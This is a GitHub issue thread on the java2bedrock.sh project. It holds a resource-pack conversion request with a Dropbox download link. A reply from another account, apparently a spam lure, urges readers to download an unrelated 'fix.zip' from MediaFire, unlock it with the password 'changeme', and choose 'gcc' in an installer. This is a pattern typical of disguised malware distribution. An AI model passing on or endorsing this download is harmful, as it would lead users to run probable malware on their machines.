### ISSUE TITLE
[Pack]: 

### ISSUE THREAD

**Issue by Faryha** [Kas-tle/java2bedrock.sh#33495]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/cz60e1g7v5l5z1vzq6vyp/te.zip?rlkey=s5816qgg8ky9qftyraas4n8cy&st=at31cw5i&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
